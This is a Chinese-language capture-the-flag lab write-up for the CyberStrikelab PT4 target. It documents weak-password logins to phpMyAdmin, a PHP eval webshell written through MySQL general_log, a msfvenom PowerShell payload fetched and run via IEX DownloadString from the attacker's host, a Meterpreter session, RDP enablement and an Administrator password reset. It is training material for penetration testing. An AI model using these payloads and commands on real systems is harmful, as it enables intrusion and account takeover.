目录

CyberStrikelab PT4

靶标介绍:正面硬刚不行?那我侧面突破!对了,听说管理员桌面上有惊喜~

关键词:Privilege 信息收集 弱密码 RDP Evasion

运行openvpn,访问靶机

# 信息收集

站点使用了DEDECMS,搜索DEDECMS漏洞,找到的漏洞文章都是要进后台的,尝试弱口令登录admin用户

提示admin用户不合法

尝试cyberstrikelab/123456,提示密码错误,通过这个提示可以判断,存在cyberstrikelab用户,多次尝试,发现不太行

扫描目录,可以发现

  • shell.php是一个探针
  • windows系统
  • web绝对路径: C:/WWW
  • 站点使用phpmyadmin,可以尝试弱口令登录试试

弱口令:root:cyberstrikelab,登录成功

admin用户的密码是加密的

直接用phpmyadmin写马子方便一点

SHOW VARIABLES LIKE 'secure_file_priv'
1

secure_file_priv值是null,不能直接写文件,尝试日志文件写马

SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = 'C:/WWW/2.php';
select "<?= eval($_POST[1]);?>";
1
2
3

# 上线msf

蚁剑连接,发现直接就是system权限

flag在C:/目录下

另一个flag在Administrator用户的个性化桌面的幻灯片放映里

尝试直接上线msf,方便开启rdp

在生成exe上传过程非常不顺利,感觉马没了

尝试powershell内存上线,本地生成powershell上线脚本

msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -f psh-reflection -o payload.ps1
1

开启web服务

python3 -m http.server 80
1

在蚁剑执行命令下载并执行powershell脚本

powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://172.16.233.2/payload.ps1')"
1

本地开启msf

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 10.0.0.3
set lport 4444
run
1
2
3
4
5
6

上线成功

开启靶机rdp

run post/windows/manage/enable_rdp
1

我已经开过了,所以这里提示rdp已经开启

进入靶机修改Administrator密码

shell
net user Administrator P@ss123
1
2

然后就可以远程登录rdp,在个性化里更换桌面幻灯片

最后一次更新于: 2025/09/20, 17:34:37